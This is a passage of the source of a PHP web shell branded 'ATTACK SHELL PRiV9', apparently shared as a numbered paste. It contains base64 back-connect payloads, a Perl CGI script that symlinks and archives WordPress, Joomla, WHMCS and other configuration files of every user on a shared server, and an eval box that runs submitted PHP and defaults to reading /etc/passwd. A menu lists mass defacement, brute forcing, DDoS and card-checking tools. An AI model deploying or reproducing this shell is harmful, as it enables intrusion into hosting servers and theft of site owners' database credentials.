  100. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
  101. Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  102. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
  103. zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
  104. i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
  105. RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  106. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
  107. 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; $configshell = '#!/usr/bin/perl -I/usr/local/bandmin
  108. print "Content-type: text/html\n\n";
  109. print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hxxp://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  110. <html xmlns="hxxp://www.w3.org/1999/xhtml">
  111.  
  112. <head>
  113. <meta hxxp-equiv="Content-Language" content="en-us" />
  114. <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
  115. <title>Priv8 SCR</title>
  116. <style type="text/css">
  117. .newStyle1 {
  118.  font-family: tahoma, verdana, Arial;
  119.  font-size: medium;
  120.  color: #FFFFFF;
  121. background-color: #666666;
  122. text-align: center;
  123. }
  124. </style>
  125. </head>
  126. ';
  127. sub lil{
  128.    ($user) = @_;
  129. $msr = qx{pwd};
  130. $kola=$msr."/".$user;
  131. $kola=~s/\n//g;
  132. symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.'-joomla.txt') ;
  133. symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt') ;
  134. symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla - home.txt') ;
  135. symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wordpress.txt') ;
  136. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wordpress.txt') ;
  137. symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.'-wordpress - web.txt') ;
  138. symlink('/home/'.$user.'/public_html/SSI.php',$kola.'- C M F .txt') ;
  139. symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.'- C M F - forum.txt') ;
  140. symlink('/home/'.$user.'/public_html/inc/config.php',$kola.'- MyBB.txt') ;
  141. symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.'- MyBB - forum.txt') ;
  142. symlink('/home/'.$user.'/public_html/config.php',$kola.'- Other.txt') ;
  143. symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'- Balitbang.txt') ;
  144. symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-clients.txt') ;
  145. symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-client.txt') ;
  146. symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt') ;
  147. symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ;
  148. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'- whmcs - whmcs.txt') ;
  149. symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'- whm - whm.txt');
  150. symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'- VBulletin - forum.txt');
  151.  symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' - PhpBB - forum.txt') ;
  152. symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'- whmc - whmc.txt');
  153.  symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' - whmcs2.txt');
  154.  symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' -mangewhmcs.txt');
  155.  symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' -myshop.txt');
  156. symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
  157. symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
  158. symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
  159. symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
  160. symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
  161. symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
  162. symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
  163. symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
  164. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'- wordpress - wp.txt');
  165. symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'- wwordpress - wp - beta.txt');
  166. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'- wordpress - beta.txt');
  167. symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
  168. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'- wordpress -wordpress.txt');
  169. symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'- wordpress - wordpress-beta.txt');
  170. symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'- wordpress -news.txt');
  171. symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'- wordpress - new.txt');
  172. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'- wordpress - blogs.txt');
  173. symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'- wordpress - home.txt');
  174. symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'- wordpress - protal.txt');
  175. symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'- wordpress - site.txt');
  176. symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'- wordpress - main.txt');
  177. symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'- wordpress - test.txt');
  178. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla - joomla .txt');
  179. symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'- joomla - protal.txt');
  180. symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'- joomla - joo.txt');
  181. symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'- joomla - cms.txt');
  182. symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'- joomla - site.txt');
  183. symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'- joomla - main.txt');
  184. symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'- joomla - news.txt');
  185. symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'- joomla - new.txt');
  186. symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'- joomla - home.txt');
  187. symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'- vb.txt');
  188. symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'- vb3.txt');
  189. symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
  190. symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
  191. symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
  192. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
  193. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
  194. symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt');
  195. symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'- zencart - shop.txt');
  196. symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt');
  197. symlink('/home/'.$user.'/public_html/Settings.php',$kola.'- smf.txt');
  198. symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'- smf - smf.txt');
  199. symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'- smf - forum.txt');
  200. symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'- smf - forums.txt');
  201. symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'- upload .txt');
  202. symlink('/home/'.$user.'/public_html/incl/config.php',$kola.'- malay.txt');
  203. symlink('/home/'.$user.'/public_html/config/koneksi.php',$kola.'- lokomedia.txt');
  204. symlink('/home/'.$user.'/system/sistem.php',$kola.'- lokomedia.txt');
  205. }
  206. if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  207.  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
  208. } else {
  209.  $buffer = $ENV{'QUERY_STRING'};
  210. }
  211. @pairs = split(/&/, $buffer);
  212. foreach $pair (@pairs) {
  213.  ($name, $value) = split(/=/, $pair);
  214.  $name =~ tr/+/ /;
  215.  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  216.  $value =~ tr/+/ /;
  217.  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  218.  $FORM{$name} = $value;
  219. }
  220. if ($FORM{pass} eq ""){
  221. print '
  222. <body class="newStyle1">
  223. <p>&nbsp;</p>
  224. <form method="post">
  225. <textarea name="pass" style="width: 543px; height: 400px"></textarea>
  226. <br /><br />
  227. <input name="tar" type="text" style="width: 212px" /><br /><br />
  228. <input name="Submit1" type="submit" value="Hajar ..!" style="width: 99px" />
  229. <br />
  230. </form>';
  231. }else{
  232. @lines =<$FORM{pass}>;
  233. $y = @lines;
  234. open (MYFILE, ">tar.tmp");
  235. print MYFILE "tar -czf ".$FORM{tar}.".tar ";
  236. for ($ka=0;$ka<$y;$ka++){
  237. while(@lines[$ka]  =~ m/(.*?):x:/g){
  238. &lil($1);
  239. print MYFILE $1.".txt ";
  240. for($kd=1;$kd<18;$kd++){
  241. print MYFILE $1.$kd.".txt ";
  242. }
  243. }
  244. }
  245. print'<body class="newStyle1">
  246. <p>Done !!</p>
  247. <p>&nbsp;</p>';
  248. if($FORM{tar} ne ""){
  249. open(INFO, "tar.tmp");
  250. @lines =<INFO> ;
  251. close(INFO);
  252. system(@lines);
  253. print'<p><a href="'.$FORM{tar}.'.tar"> download  file</a></p>';
  254. }
  255. }
  256. print"
  257. </body>
  258. </html>";'; ?>
  259. <html><head><link href='hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg' rel='icon' type='image/gif'><script language='JavaScript'>
  260. var txt="ATTACK SHELL PRiV9 ";
  261. var kecepatan=120;var segarkan=null;function bergerak() { document.title=txt;
  262. txt=txt.substring(1,txt.length)+txt.charAt(0);
  263. segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
  264. </script>
  265. <link href='hxxp://fonts.googleapis.com/css?family=Roboto:400,300,400italic,500,700%7CRopa+Sans%7COswald' rel='stylesheet' type='text/css'/>
  266. <script type="text/javascript">
  267. function tukar(lama,baru){
  268.     document.getElementById(lama).style.display = 'none';
  269.     document.getElementById(baru).style.display = 'block';
  270. }
  271. </script>
  272. <style type="text/css">
  273. body{
  274.     background:#000000;;
  275. }
  276. a {
  277. text-decoration:none;
  278. }
  279. a:hover{
  280. border-bottom:1px solid #FF0000;
  281. }
  282. *{
  283.     font-size:11px;
  284.     font-family:Tahoma,Verdana,Arial;
  285.     color:#FFFFFF;
  286. }
  287. #menu{
  288.     background:none;
  289.     margin:8px 2px 4px 2px;
  290. }
  291. .menu a{
  292. background-color:#CCFF00;
  293.   display:inline-block;
  294.   position:relative;
  295.   margin:30px 5px;
  296.   border:1px solid #FFFFFF;
  297.   padding:20px 20px 20px 80px;
  298.   color:#fff;
  299.   transition:all 0.4s ease
  300. }
  301.  
  302. .menu a:hover{
  303.   background:#2c3e50
  304. }
  305. .tabnet{
  306.     margin:15px auto 0 auto;
  307.     border: 1px solid #CCCC00;
  308. }
  309. .main {
  310.     width:100%;
  311.         box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  312. }
  313. .gaya {
  314.     color: #FF0000;
  315. }
  316. .inputz{
  317.     background:#000000;
  318.     border:0;
  319.     padding:2px;
  320.     border-bottom:1px solid #FFFFFF;
  321.     border-top:1px solid #FFFFFF;
  322. }
  323. .inputzbut{
  324.     background:#000000;
  325.     color:#FFFFFF;
  326.     margin:0 4px;
  327.     border:2px solid #000000;
  328.  
  329. }
  330. .inputz:hover,{
  331.     border-bottom:1px solid #FF0000;
  332.     border-top:1px solid #FF0000;
  333. }
  334. .inputzbut:hover{
  335. border:2px solid #FFFFFF;
  336. }
  337. .output {
  338.     margin:auto;
  339.     border:1px solid #FF0000;
  340.     width:100%;
  341.     height:400px;
  342.     background:#000000;
  343.     padding:0 2px;
  344. }
  345. .cmdbox{
  346.     width:100%;
  347. }
  348. .head_info{
  349.     padding: 0 4px;
  350. }
  351. .jaya{ font-family: ;}
  352.  
  353. .coli{
  354.     font-size:30px;
  355.     padding:0;
  356.     color:#000000;
  357. }
  358. .coli_tbl{
  359.     text-align:center;
  360.     margin:0 4px 0 0;
  361.     padding:0 4px 0 0;
  362.     border-right:2px solid #FFFFFF;
  363. }
  364. .phpinfo table{
  365.     width:100%;
  366.     padding:0 0 0 0;
  367. }
  368. .phpinfo td{
  369.     background:#000000;
  370.     color:#000000;
  371. padding:6px 8px;;
  372. }
  373. .phpinfo th, th{
  374.     background:#000000;
  375.     border-bottom:1px solid #CCCC00;
  376. font-weight:normal;
  377. }
  378. .phpinfo h2, .phpinfo h2 a{
  379.     text-align:center;
  380.     font-size:16px;
  381.     padding:0;
  382.     margin:30px 0 0 0;
  383.     background:#CCCC00;
  384.     padding:4px 0;
  385. }
  386. .explore{
  387. width:100%;
  388. }
  389. .explore a {
  390. text-decoration:none;
  391. }
  392. .explore td{
  393. border-bottom:2px solid #FFFFFF;
  394. padding:0 8px;
  395. line-height:24px;
  396. }
  397. .explore th{
  398. padding:3px 8px;
  399. font-weight:normal;
  400. background:#000000;
  401. border-bottom:2px solid #FFFFFF;
  402. }
  403. .explore th:hover , .phpinfo th:hover{
  404. border-bottom:1px solid #FF0000;
  405. }
  406. .explore tr:hover{
  407. background:#000000;
  408. }
  409. .viewfile{
  410. background:#000000;
  411. color:#000000;
  412. margin:4px 2px;
  413. padding:8px;
  414. }
  415. .sembunyi{
  416. display:none;
  417. padding:0;margin:0;
  418. }
  419. .btn {
  420. background:#000000;
  421. width:auto;
  422. height:auto;
  423. padding:5px;
  424. border:2px #FFFFFF solid;
  425. font-family:"oswald";
  426. font-size:14px;
  427. color:#FFFFFF;
  428. text-align:center;
  429. text-decoration:none;
  430. text-transform:uppercase;
  431. }
  432. .btn:hover {
  433. background:#FFFFFF;
  434. width:auto;
  435. height:auto;
  436. padding:5px;
  437. margin:0px;
  438. border:2px #000000 solid;
  439. font-family:"oswald";
  440. font-size:14px;
  441. color:#000000;
  442. text-align:center;
  443. text-decoration:none;
  444. text-transform:uppercase;
  445. }
  446. body {
  447. background:#FFFFFF;
  448. background:url("hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg");
  449. }
  450. .header {
  451. background:#000000;
  452. width:100%;
  453. height:auto;
  454. poisition:static;top:0px;
  455. font-family:"Oswald";
  456. font-size:16px;
  457. color:#FFFFFF;
  458. border-bottom:2px solid #FFFFFF;
  459. padding-bottom:20px;
  460. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  461. }
  462. /* Vn Navigasi
  463. -------------------------*/
  464. .vn-nav{
  465.   background:#000000;
  466.   width:auto;
  467.   padding-top:15px;
  468.   padding-bottom:15px;
  469.   font-size:14px;
  470.   padding-left:20px;
  471.   border-bottom: #000000 3px solid;
  472. }
  473.  
  474. .vn-nav ul { margin: 0; padding: 0; list-style-type: none; list-style-image: none; }
  475.  
  476. .vn-nav li { margin-right: 0px; display: inline; }
  477.  
  478. .vn-nav ul li a { text-decoration:none;  margin: 0px; padding: 15px 20px 15px 20px; color:#ffffff; }
  479.  
  480. .vn-nav li.current-menu-item a{ color: #fff; text-decoration:none; background-color:#000000; }
  481.  
  482. .vn-nav li.current_page_item  { color: #fff; text-decoration:none; background-color:#000000; }
  483.  
  484. /* Vn Simple Modal
  485. -------------------------*/
  486. .modalDialog {
  487.     position: fixed;
  488.     font-family: Arial, Helvetica, sans-serif;
  489.     top: 0;
  490.     right: 0;
  491.     bottom: 0;
  492.     left: 0;
  493.     background: rgba(0,0,0,0.8);
  494.     z-index: 99999;
  495.     opacity:0;
  496.     -webkit-transition: opacity 400ms ease-in;
  497.     -moz-transition: opacity 400ms ease-in;
  498.     transition: opacity 400ms ease-in;
  499.     pointer-events: none;
  500. }
  501.  
  502. .modalDialog:target {
  503.     opacity:1;
  504.     pointer-events: auto;
  505. }
  506.  
  507. .modalDialog > div {
  508.     width: 500px;height:auto;
  509.     position: relative;
  510.     margin: 5% auto;
  511.     padding: 5px 20px 13px 20px;
  512.     background: #34495e;color:#fff;
  513. }
  514.  
  515. .close {
  516.     background: #2c3e50;
  517.     color: #000000;padding:5px;border-radius:0 0 12px 0;
  518.     line-height: 16px;
  519.     position: absolute;
  520.     right: -55px;
  521.     text-align: center;
  522.     top: 0;
  523.     width: 16px;
  524.     text-decoration: none;
  525.     font-weight: bold;
  526. }
  527.  
  528. .close:hover { background: #2c3e50;color:#e74c3c }
  529.  
  530. /* Vn Button
  531. -------------------------*/
  532.  
  533. .vn-green a{
  534. background-color:#CCFF00;
  535.   display:inline-block;
  536.   position:relative;
  537.   margin:30px 5px;
  538.   border:1px solid #FFFFFF;
  539.   padding:20px 20px 20px 80px;
  540.   color:#fff;
  541.   transition:all 0.4s ease
  542. }
  543.  
  544. .vn-green a:hover{
  545.   background:#2c3e50
  546. }
  547. .content{
  548. background:#2E2A2A;
  549. width:100%;
  550. height:auto;
  551. padding-bottom:10px;
  552. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  553. }
  554. .footer{
  555. background:#000000;
  556. width:100%;
  557. height:auto;
  558. position:static;bottom:0px;
  559. padding-top:15px;
  560. padding-bottom:15px;
  561. font-family:"Oswald";
  562. font-size:10px;
  563. color:#FFFFFF;
  564. text-align:center;
  565. text-transform:uppercase;
  566. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  567. }
  568. .footer:a link{
  569. font-family:"Oswald";
  570. }
  571. .cr {
  572. background:none;
  573. float:right;
  574. padding-right:15px;
  575. padding-top:20px;
  576. font-family:"Oswald";
  577. font-size:24px;
  578. color:#FFFFFF;
  579. text-transform:uppercase;
  580. }
  581. .cr:hover {
  582. background:none;
  583. float:right;
  584. padding-right:15px;
  585. padding-top:20px;
  586. font-family:"Oswald";
  587. font-size:24px;
  588. color:#000000;
  589. text-transform:uppercase;
  590. }
  591. .menu-wrap{
  592. background:#000000;
  593. width:100%;
  594. height:auto;
  595. padding-bottom:10px;
  596. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  597. }
  598. </style>
  599. </head>
  600.  
  601.  
  602. <body onLoad="document.getElementById('cmd').focus();">
  603. <div class="main">
  604. <div class="vn-nav">
  605. <ul>
  606.   <li><a href="#openModal">About</a>
  607.  
  608. <div id="openModal" class="modalDialog">
  609.     <div>
  610.         <a href="#close" title="Close" class="close">X</a>
  611.                 <center><p><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="350px" height="290px"/><br/>egyshell team are a Network Security and YouTube Vloger.<br/><br/>hacking is the art of creative problem resolving<br/></p>
  612. <div class="vn-green" style="text-align: center;"><a href="hxxps://www.facebook.com/r00t.info/" target="_blank">r00t.info</a> | <a href="hxxp://r00t.info" target="_blank">site</a> | <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Attack shell priv8</a></div></center>
  613. </div>
  614. </div></li>
  615. </ul>
  616. <div class="cr">lacked by r00t.info</div>
  617. </div>
  618. <div class="header">
  619. <div class="head_info">
  620. <table ><tr>
  621. <td><table class="coli_tbl"><tr><td><a href="?"><span class="coli"><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="225" heigth="155" /></span></a></td></tr><tr><td><b></b></td></tr></table></td>
  622. <td><?php echo $buff; ?></td>
  623. </tr></table>
  624. </div>
  625. </div>
  626. <div class="menu-wrap">
  627. <div class="vn-nav">Menu</div><br/>
  628. <!-- menu start -->
  629. <center><div id="menu">
  630. <a class="btn" href="?<?php echo "y=".$pwd; ?>">Home</a>
  631. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>
  632. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>
  633. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>
  634. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>
  635. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>
  636. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>
  637. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>
  638. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>
  639. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>
  640. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>
  641. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dos">DDos</a>
  642. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>
  643. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>
  644. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>
  645. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a>
  646. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>
  647. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a><br/><br/>
  648. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>
  649. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>
  650. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>
  651. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>
  652. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>
  653. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>
  654. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>
  655. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a>
  656. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>
  657. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a><br/><br/>
  658. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>
  659. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>
  660. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>
  661. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>
  662. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>
  663. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>
  664. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a>
  665. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ccv">CC Tester</a>
  666. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>
  667. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=music">Musicfiles</a><br/><br/>
  668. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>
  669. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>
  670. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=color">Color Tools</a>
  671. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=telin">Speedtest</a>
  672. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=idfinder">Facebook ID Finder</a>
  673. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=schoolhos">Schoolhos</a>
  674. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcr">WHM Cracker</a>
  675. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=rd">Root Devil Scanner</a>
  676. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dork">Dork List</a><br/><br/>
  677. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ppcheck">Paypal Checker</a>
  678. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jce">JCE Exploiter</a>
  679. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=comuser">Com_user Scanner</a>
  680. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=configkiller">Config File Killer</a>
  681. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=spoison">Silent Poison</a>
  682. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mailbomb">Bomb Mailer</a>
  683. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcsploit">WHMCS Exloiter</a>
  684. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ascii">ASCII Encoder</a><br/><br/>
  685. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=apache">Apache</a>
  686. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hostgator">Hostgator</a>
  687. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bluehost">Bluehost</a>
  688. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=litespeed">Litespeed</a>
  689. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ovh">OVH</a>
  690. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=forbidden">Forbidden</a>
  691. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=phpnuke">PHP Nuke</a>
  692. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmtool">WHMCS Tools</a>
  693. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=unzip">Unzip</a>
  694. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=systemview">View System</a>
  695. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=traintup">Traintup</a><br/><br/>
  696. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mysqlback">Mysql Backup</a>
  697. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bind">Bindconnect</a>
  698. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=security">Security</a>
  699. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=shellscan">Shell Scanner</a>
  700. <a class="btn" href="?<?php echo $self.'gdork'?>">Dork Creator</a>
  701. <a class="btn" href="<?php echo $self.'?obfuscate'?>">Obfuscator</a>
  702. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=logout">Log-Out</a><br/><br/>
  703.  
  704.  
  705. </div></center>
  706. <!-- menu end -->
  707. </div>
  708. <div class="content">
  709. <div class="vn-nav">Explore Like a Boss</div>
  710. <?php @ini_set('display_errors', 0); if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  711. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  712. <table class="cmdbox">
  713. <tr><td>
  714. <textarea class="output" name="cmd" id="cmd">
  715. <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?>
  716. </textarea>
  717. <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
  718. </table>
  719. </form>
  720.  
  721. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) { ?>
  722. <form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">
  723. <?php echo "<center/><br/><b><font color=#FF0000>+--==[ Mysql Interface ]==--+</font></b><br><br>"; mkdir('mysql', 0755); chdir('mysql'); $akses = ".htaccess"; $buka_lah = "$akses"; $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  724. AddType application/x-hxxpd-php .cpc
  725. "; fwrite ( $buka , $metin ) ; fclose ($buka); $sqlshell = '<?
  726. $PASSWORD = "root_xhahax";
  727. $USERNAME = "xhahax";
